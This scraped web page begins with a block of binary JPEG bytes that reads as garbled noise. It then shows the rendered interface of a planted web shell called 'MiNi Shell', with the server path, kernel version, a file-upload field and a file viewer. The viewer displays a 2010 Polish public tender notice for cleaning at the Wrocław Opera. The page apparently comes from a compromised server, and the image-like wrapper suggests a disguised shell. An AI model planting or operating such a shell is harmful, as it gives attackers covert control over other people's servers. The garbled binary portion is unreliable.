JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100108/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100108/5809-N-2010.html

<p class="kh_header"><b>Wrocław: UTRZYMANIE CZYSTOŚCI W OBIEKTACH OPERY WROCŁAWSKIEJ</b><br>
<b>Numer ogłoszenia: 5809 - 2010; data zamieszczenia: 08.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Opera Wrocławska , ul. Świdnicka 35, 50-066 Wrocław, woj. dolnośląskie, tel. 071 3708800, faks 081 3708852.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE CZYSTOŚCI W OBIEKTACH OPERY WROCŁAWSKIEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie czystości w budynku Opery Wrocławskiej przy ul. Świdnickiej 35 (razem powierzni 7042,5 m2) i archiwum w lokalu wynajmowanym przy ul. Świdnickiej 36( powierznia 36 67,6 m2 )oraz chodników od strony ulic Świdnickiej, ul. Modrzejewskiej i od strony elewacji południowej (razem powierzni 1262,6 m2). Szczegółowy zakres usługi obejmuje:

1) Sprzątanie niżej wymienionych powierzchni oraz wyposażanie węzłów sanitarnych w:

- mydło w płynie
- mydło w kostce w węzłach sanitarnych niewyposażonych na pojemnik na mydło w płynie
- papier toaletowy
-	ręczniki papierowe
2). Usługa ma być wykonywana przez 7 dni w tygodniu z wyłączeniem sobót i niedziel dla pomieszczeń biurowych na poziomie 5 i 7, z wyjątkiem sekretariatów i pomieszczenia koordynacji pracy artystycznej. Wszystkie pomieszczenia muszą być sprzątane w godzinach nie kolidujących z pracą administracji i artystów. Administracja pracuje od poniedziałku do piątku w godzinach 800 - 1600. Praca zespołów artystycznych odbywa się od poniedziałku do soboty w godzinach 1000 - 1400 oraz 1800  - 2200  (próby), 1900 - 2200 (spektakle), w niedziele spektakle w godzinach  1700 - 2000.Usługa powinna być wykonywana przy zastosowaniu atestowanych profesjonalnych środków czystości oraz profesjonalnego sprzętu ręcznego i mechanicznego. Wykonawca zobowiązany jest do stosowania środków czystości: skutecznych, niezawodnych, bezpiecznych (posiadających atesty), nieagresywnych i niepowodujących zniszczenia mebli i innych elementów wyposażenia.
3). Pozostałe wymagania Zamawiającego:
a)	pracownicy Wykonawcy zatrudnieni na terenie budynku winni być ubrani jednolicie i posiadać umieszczone w widocznym miejscu identyfikatory,
b)	z brygadzistą musi być zapewniona łączność za pomocą telefonu komórkowego,
c)	w zakresie sprzątania chodników należy uwzględnić również obowiązek: odśnieżania, posypywania piaskiem z solą, podlewania roślin w gazonach przy elewacji wschodniej, mycia gablot umieszczonych na elewacjach oraz drzwi zewnętrznych, utrzymania w czystości schodków, wycieraczek i popielniczek przy wejściach do budynku.
d)	sprzątanie okresowe wnętrz będzie każdorazowo odbierane przez kompetentnego pracownika Zamawiającego (kierownik działu gospodarczego, administrator budynku, konserwator, energetyk), co zostanie potwierdzone wpisem w Dzienniku okresowego sprzątania,
e)	do zakresu sprzątania wnętrz budynku należy w szczególności:
-	omiatanie pajęczyn przy sufitach za pomocą zmiotek umieszczonych na kijach teleskopowych, mycie luster, czyszczenie balustrad, drzwi, dostępnych powierzchni mebli biurowych i podokienników, usuwanie śmieci z pojemników biurowych,
-	dywany i wykładziny dywanowe odkurzane mechanicznie, w przypadku wystąpienia widocznego zabrudzenia należy czyścić za pomocą odkurzaczy piorących (opcjonalnie raz na pół roku),
-	posadzki z glazury, lastriko oraz wykładziny gładkie z tworzyw sztucznych zamiatane oraz myte odpowiednimi środkami chemicznymi za pomocą ręcznych mopów, 
-	posadzki z glazury raz w roku oczyszczone mechanicznie,
-	posadzki parkietowe konserwowane za pomocą przeznaczonych do tego środków przy każdym sprzątaniu (zmywaniu wilgotnym mopem),
-	posadzki betonowe w piwnicach czyszczone odkurzaczem przemysłowym,
-	węzły sanitarne w garderobach i ogólnodostępne z korytarzy myte odpowiednimi środkami, pojemniki na nieczystości opróżniane, zasobniki na papier toaletowy, ręczniki papierowe i mydło uzupełniane, w muszlach toaletowych uzupełniane kostki sanitarne.
-	mycie drzwi przeciwpożarowych na poziomie 0 raz w miesiącu
-    omiatanie ścian z osypujących się wewnętrznych tynków renowacyjnych do  
     wys. 1m na poziomie 0 raz w miesiącu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.61.00.00-6, 90.91.12.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 3.1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1  ustawy Pzp, spełniają warunki, o których mowa w art. 22 ust. 1 w/w ustawy a także pozostałe warunki szczegółowe określone w niniejszej specyfikacji istotnych warunków zamówienia.
3.2.	Warunki szczegółowe:
   3.2.1 Wykonawca winien w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizować lub realizować z należytą starannością, co najmniej jedną usługę utrzymania czystości odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot niniejszego zamówienia przez okres co najmniej 12 miesięcy.
            Przez usługę utrzymania czystości odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot niniejszego zamówienia należy rozumieć zamówienie spełniające łącznie następujące warunki:

-	sprzątany obiekt jest obiektem kubaturowym typu: teatr, opera, operetka,         
  filharmonia, bank, kino, biurowiec.
	- powierzchnia sprzątanego obiektu wynosi co najmniej 7 000m2,
             - w sprzątanym obiekcie  podłogi pokryte są : parkietami, wykładzinami:
               dywanowymi i kamiennymi (muszą występować łącznie wszystkie rodzaje  podłóg)
   3.2.2 Wykonawca ubiegający się o niniejsze zamówienie winien posiadać  ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż  200 000 zł.
   3.3  Sposób  oceny spełniania warunków udziału w postępowaniu: spełnia /nie  spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 10.1.	Wykonawca jest zobowiązany dołączyć do Formularza Kwalifikacyjnego  następujące oświadczenia i dokumenty:
10.1.1.	Oświadczenie (druk), że Wykonawca spełnia warunki określone w art. 22 ust.1 ustawy Pzp. 
              W przypadku, gdy ofertę składa kilku Partnerów składających wspólną ofertę  (Konsorcjum) powyższe oświadczenie podpisuje Lider.
10.1.2      Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy  przed  upływem terminu składania ofert w niniejszym przetargu,
                W przypadku, gdy ofertę składa kilku Partnerów składających wspólną ofertę (Konsorcjum) każdy z nich składa powyższe dokument.
10.1.3      Pełnomocnictwo dla Lidera lub pełnomocnika, jeżeli oferta będzie podpisana
                 przez pełnomocnika lub Lidera.
10.1.4    Wykaz zrealizowanych lub realizowanych usług w zakresie utrzymania czystości (druk ) w okresie ostatnich  3 lat przed dniem wszczęcia postępowania a jeżeli okres prowadzonej działalności jest krótszy to w tym okresie potwierdzający spełnienie warunku  3.2.1  Do wykazu zrealizowanych lub realizowanych usług należy dołączyć dokumenty potwierdzające że usługi zostały wykonane lub są wykonywane należycie.
10.1.5   Opłacona polisa a w przypadku jej braku inny  dokument  potwierdzający, że Wykonawca posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 200 000 zł
10.1.6   Oświadczenie ( druk), o braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1  ustawy Pzp. W przypadku, gdy ofertę składa kilku Partnerów składających wspólną ofertę (Konsorcjum) każdy z nich składa powyższe oświadczenie.
10.1.7   W przypadku, gdy Wykonawca w miejsce któregoś z dokumentów, o których mowa wyżej dostarczy jego kserokopię, kserokopia ta musi być poświadczona za zgodność z oryginałem. Należy na kserokopii zamieścić zapis: za zgodność z oryginałem oraz datę i czytelny podpis lub parafę i pieczątkę imienną. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów, jeśli przedstawione kserokopie będą nieczytelne lub będą wzbudzać uzasadnione wątpliwości, co do ich prawdziwości
10.1.8    Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP to zamiast dokumentu o którym mowa w pkt. 10.1.2 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.opera.wroclaw.pl/1/index.php?page=49.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Opera Wrocławska
ul. Świdnicka 35
50-066 Wrocław
pok. 541.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2010 godzina 10:00, miejsce: Opera Wrocławska
ul. Świdnicka 35
50-066 Wrocław
pok 552 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com